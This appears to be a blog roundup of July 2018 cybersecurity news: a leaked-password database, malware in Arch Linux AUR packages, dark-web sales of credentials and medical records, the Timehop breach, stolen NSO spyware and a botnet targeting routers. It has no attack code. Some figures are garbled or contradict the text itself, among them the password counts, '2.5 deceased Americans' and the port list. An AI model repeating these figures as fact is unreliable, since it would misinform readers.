July 14, 2018

Database of 15.6 million hacked passwords available for download on “haveibeenpwned” Website

We always wonder if our email id or passwords have been ever hacked or breached, but we don't know how to check whether we have been a victim of cybercrime ever.

A website called 'Have I Been Pwned' help users to find out if their email id and passwords have been ever hacked or faced any kind of breach or not. The website also reveals the number of times your password or email-id has been compromised.

Over the years, the website has released different versions of the database with an increase in the number of hacked accounts and passwords. In August 2017 version, they released a database of 320 million unsafe passwords. And within six month period, the number increased to 500 million. Now, they have released the third version on July 13, the database has 15.6 million passwords which have been involved in past data breaches.

The database of passwords released by the website is considered unsafe and non-reliable as they have once been used in past for data breaches and could be reused again. If your password appears on the list, change it as soon as possible.

According to the website, there is a different search feature for both pwned email-id and pwned password, "When email addresses from a data breach are loaded into the site, no corresponding passwords are loaded with them. Separately to the pwned address search feature, the Pwned Passwords service allows you to check if an individual password has previously been seen in a data breach. No password is stored next to any personally identifiable data (such as an email address) and every freely available password is SHA-1 hashed."

The entire database of insecure passwords is freely available for download on the website in two different links, one is  “torrent” link and another one is  “Cloudflare” link, both of them are stored in SHA-1 hash.

To check whether your email id has been pwned or not, just visit this website and type your email-id. The interesting fact lay underneath the search bar, it shows how many times your email id has been pwned on breached sites and number of pastes. It also lists the breaches you were pwned in and the year of breaches.

To check whether your password has been pwned or not, just visit this website  and type your password. Underneath the search bar, you will find out how many times your password has been used in data breaches. On this website also you can download the entire database of insecure passwords.

July 14, 2018

Malware found in Arch Linux AUR Repository

Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code was immediately removed when the AUR team intervened. The incident occurred because the AUR team allow users to contribute to repositories that have been abandoned by their original authors.

The repository has user-submitted packages, and that is how the malware was released in the repository. A user named “xeactor” took over an ‘orphaned’ package on Saturday going by the name of “acroread” which functions as a PDF viewer and added a malicious code.

As per Git commit, “Xeactor” added a code that would download a script named “~x” from a lightweight package that allows users to share tiny pieces of text files, which in turn would execute another file named “~u”. The software meddles with “systemd” and reconfigure it. This script would run every 360 seconds.

The purpose of the second file (~u) was to collect data about each infected system including date, time, machine’s ID, package manager details, CPU information and outputs of “uname-a” and “systemctl list-units” commands and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

The AUR team have also said they have found similar code in other packages:

▬ acroread 9.5.5-8

▬ balz 1.20-3

▬ minergate 8.1-2

The malicious code changes were reversed and xeactor’s accounts were suspended. The AUR packages are user-submitted packages to the Arch Linux Repo. There are a lot of cases this year where most of the code of the operating system has been affected by some sort of malware.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Even though it does not pose any serious threat to the infected computers, it is anticipated that “xeactor” could launch another malware as any self-update mechanism was not included.
July 14, 2018

Criminals selling login credential for $10 to government sectors

Top cyber experts claimed to have traced out a gang of criminals running a den of dark web market where sensational login credentials are for sale suggesting a huge threat for the infosec community on the planet.

 During the pathbreaking research, the cyber security experts at McAfee discovered that these cyber criminals, of late, have started selling crucial data and information to many establishments including the premier government sectors making $10 within a brief period of time.

 The hackers are believed to have got access to these testimonials from government and private bodies where a strong password does not matter in the use of the Microsoft-owned remote desktop protocol which keeps providing more breakthrough for the research experts to widen the area of studies.

 The experts have confirmed a steep rise in the use of RDP by the cyber criminals since they find it easy to cover up their activities even as the system enables the users to have an access to another set of remote device.

 What makes the facts more stunning is that the hackers sold some vital systems of automated security owned by one of the top airports and the deal in the dark web market fetched them around $10 which needs further investigation to know the modus operandi.

 More and more startling revelations are surfacing on the dark web market and the RDP shops connected herewith.

The shops in question, are in the selling spree of numerous hacked systems which include Window 10, WindowsXP and what not. What is more disturbing is that many government and renowned private bodies keep procuring RDP access.

These are basically required in the medical and healthcare sectors which are well connected to these RDP shops. These shops are full of credit card, data cards and social security access for sale much to the benefit of the attackers who can have an easy access to the admin system.

They keep doing malicious activities without running any risk. They are often let off from the crime.
The researchers are of the view that these schemes of things will not die down so long as the fragile RDPs are allowed to stay on. Need of the hour, they say, is a system administration well connected with remotely accessing mechanism.
July 13, 2018

Google Chrome to get revamped soon

The world's most used internet browser Google Chrome is being redesigned to make it more fast and secure.

Google has announced this week that they have now coded robust security technologies to safeguard against the Spectre vulnerabilities that came in limelight by their own researchers at the beginning of 2018.

Chrome 67 has a Site Isolation feature which is enabled by default for all  Chrome users, but the drawback is that this feature will increase the memory usage and it will be difficult for users using devices with 4GB RAM or less.

However, the company has promised that they will work on reducing the impact of Site Isolation technology. "Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure," Reis added.

According to the company, they have enabled Isolation technology for 99% of Chrome users on Windows, Mac, Linux, and Chrome OS. Meanwhile, for remaining users, it was not done to  "monitor and improve performance".

Now, it will interesting to note the reaction of users after Chrome 68 will be launched later this month. Users will be able to check whether Site Isolation is turned or not typing chrome://process-internals , but this does not work for Chrome 67.

"We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes," Reis writes in his blog. "Stay tuned for an update about this enforcement."
July 12, 2018

Hacker Sold US Air Force Drone Documents on Dark Web for $150

While tracking criminal activity on dark web marketplaces, a threat intelligence team Insikt Group of the security research firm Recorded Future discovered a hacker selling classified military documents for a meager amount of $150-200 on the Deep Web and Dark Web forum.

According to the research team, the hacker got a hold on the documents after they intruded by exploiting an FTP vulnerability in Netgear routers that's been known for two years.

Once the hacker got an access to the router, the intruder was easily able to invade into a  captain’s personal computer and steal a cache of sensitive documents. “While such course books are not classified materials on their own,” Recorded Future said, “in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”

The documents include contained sensitive materials, like “the M1 Abrams maintenance manual, a tank platoon training course, a crew survival course, and documentation on improvised explosive device (IED) mitigation tactics.”

The captain from whose computer all the documents were stolen had just completed a cyber safety course in February and “should have been aware of the required actions to prevent unauthorized access,” Recorded Future said.

Meanwhile, US law enforcement has started their investigating, but they have not revealed who is behind this breach. However, researchers at  Insikt Group insists that the alleged hacker is from South America, though they did not provide any information further.

July 12, 2018

Cybercriminals sell deceased patients’ record on Dark web

Despite best efforts, stolen medical records – of the living — for sale on black markets remain a huge problem. In fact, Cynerio is still seeing continued growth in the number of incidents of patient medical record breaches from hacking and unauthorized access to healthcare systems.

Meanwhile, as more medical records hit the black market the value of the stolen data declined. The reason is simple, supply and demand. By comparison, medical records are generally significantly higher value than stolen user credit card data.

Recently, Cynerio has detected an interesting new wrinkle in the sale of stolen medical data on the dark web. The research team found a post from a vendor on the dark web offering the medical records of the deceased. In this dark web listing, the vendor mentions that 60,000 of the stolen medical records available for purchase include individual death dates.

It may come as a surprise to think that fraudsters would be interested in purchasing medical records of patients that are already deceased, but there is a reason for this. When it comes to identity theft or running up fraudulent charges there is no better victim than one that can’t file a complaint. If the person whose identity is used for the fraud is deceased, it may go unnoticed for a long time.

According to a past AARP Bulletin, fraudsters attempt to steal the identities of 2.5 deceased Americans annually in an attempt open credit card accounts, apply for loans, commit tax fraud and obtain expensive mobile phones via carrier contracts.

The above are the most common forms of fraud tied to ID theft of the deceased. But, when it comes to medical records, they are often used in combination with other personal information to conduct even more sophisticated fraudulent transactions.

Besides financial fraud, criminals also use stolen medical information for illegally acquiring medical supplies and obtaining health insurance. One of the dark web one of the researchers found criminals explaining to a potential customer how they can use a medical ID to get prescribed drugs delivered to them, to order medication and even to book a doctor’s appointment for a check-up.
July 12, 2018

Timehop Data Breach Affects 21million Users'

Timehop, an add-on app that reminisces people's good old days on different social media platforms, has suffered a data breach on  July 4th,  that affected 21 million users.

The stolen data includes names, email addresses, date of the birth,  and over 4.7 million users phone number that they linked to their accounts. However, users’ old social media posts "memories" were not compromised.

The hackers were able to enter the Timehop’s cloud computing account, as it was not protected by multi-factor authentication, they transferred the data, and attacked its database.

According to the company, they first noticed the breach within two hours it started and was able to interrupt it, but unfortunately, the user's data was stolen. Users’ private messages, financial data, social media content, and Timehop data were not affected.

“That stuff is what we cared about, that stuff was protected,” Timehop’s COO Rick Webb said in an interview with TechCrunch. “We have to make a mental note to think about everything else” going forward.

The company has started two-factor authentication on its internal systems and encrypting databases to prevent future breaches.

July 10, 2018

Former NSO employee attempts to sell stolen hacking tool on Dark web

NSO is an Israeli cybersecurity contractor and software developer that specialises in helping governments to monitor enemies using spyware technology. Recently, a former employee whose name is currently being kept hidden by the authorities allegedly stole NSO’s cyber technology, spying tools and software, with the intention of selling them on the dark web for $50 million and that could harm state security, Israel’s Justice Ministry said.

The staff member stole Pegasus spyware code and attempted to sell it.

The 38-year-old senior programmer was fired due to suspicion of stealing valuable data from the company. Upon investigation it was found that he had a hard drive with company’s servers and proprietary tools stored on it, a ministry statement said on July 5. It was found under his bed when the authorities raided his house.

The company is very strict regarding their data policy because many of their technologies are sensitive such as the Pegasus software that is driven with SMS technology and can extract Whatsapp data, messages, social media data and even gain control of a smartphone’s camera to spy on the user.

The ministry said the accused, who was hired in November 2017, was called in for a hearing by NSO on 29 April before his dismissal, after which he downloaded software and information worth hundreds of millions of dollars.

NSO Group, in the same manner as many cybersecurity firms, had protections in place to prevent the external transfer of its intellectual property and software. The employee's role permitted him access to the firm's servers, tools, and source code, but he was still restricted in the same way.

The hackers attempt to steal the data and sell it to the dark web in exchange for cryptocurrency backfired because the buyer himself tipped off NSO. He was apprehended by the Lahav 433 serious crime unit and the stolen data wasn’t sold. The statement did not identify the person who contacted the former NSO employee.
July 10, 2018

New Botnet posing threat to internet devices

A one year old Botnet starts shaking the cyberworld forcing the security experts to counter the deepening threat these days.

Popularly known as Hide-N-Seek, the Botnet is being deployed by the attackers to target the internet of things computing devices within a short spell of time.

 Within less than a year since the experts identified it,HNS was said to have infected many internet of things devices leaving the users in huge confusion.

 Apart from it, the attackers, in all probability, might put in place the Botnet-- targetting the database of cross-platform solutions much to the worry of millions of internet users.

 The joint team of experts from two top most cyber security firms, who are doing an extensive study have observed that the hide-n-seek Botnet, now in place to exploit the data base system, has expanded its area of network to infect more devices bypassing the routers scope.

 The researchers who were picked up from Oihoo 360 and Netlab for the research have said the hide-n-seek Botnet is being deployed to exploit new CISCO Linksys Router RCE JAW/1.0 RCE, OrientDB RCE, TP-Link-Routers RCE Netgear RCE and AVTECH RCE.

 They say the Botnet in question has huge processing power in view of the capacity to scan some vital exploitation.

These might include 23 Telnet,8080http web services,80 HTTP Web Service5984, CouchDB 2480 OrientDB and 5984 CouchDB. HNS always keeps supporting 7 exploiting methods and it adds a cpuminer mining program where the functionings are quite improper.

 The researchers have found it very easy to identify the Hide-N-seek Botnet which, like others keep infecting the popular servers known as OrientDB.

 To name some of the infected services are JAWS/1.0 web server, Apache CouchDB, OrientDB, AVTECH devices (webcam, webcam), CISCO Linksys router.
The experts have categorically stressed more research to weed out the threat in store.
July 09, 2018

Hackers steal 600 gallons of fuel from a US gas station

We have read about credit card skimmers at ATMs or gas stations but how would someone hack into fuel pumps to steal gas? From recent hacks and data breach incidents, it seems the hackers have changed their targets. Apparently, cybercriminals have got their hands on a high-tech electronic device that allows them to steal gasoline from fuel pumps without getting caught. These hackers hacked a US gas station to pilfer 600 gallons of gas worth $1,800 and did so brazenly in the middle of the day.

The Detroit police department is looking for two men suspected in the larceny of fuel from a Marathon Oil Service Station in the 17800 block of W. Seven Mile on the city's west side.

The Marathon gas station suffered this attack around 1pm on June 23, 2018, when two men reached the pump for fuel. Reportedly, they took control of the pump at the gas station through a remote device, thus preventing the hack from being blocked by the clerk present at the station from his system.

Anyone who recognises the suspects is asked to call DPD'sEight Precinct.

According to Fox2Detroit, the clerk, Aziz Awadh, said about the incident, “I tried to stop it here from the screen but the screen’s not working. I tried to stop it from the system; nothing working.”

Awadh told that he was able to shut down the pump only after he found the emergency kit. He then called the police. However, until then, the hackers managed to drain a large volume of fuel.

In a statement, Dontae Freeman, Detroit police spokesman told FOX that “the suspects had about 10 large vehicles lined up at the pump and filled their tanks with gas. He said investigators believe it took the suspects about 90 minutes to fill up the vehicles.”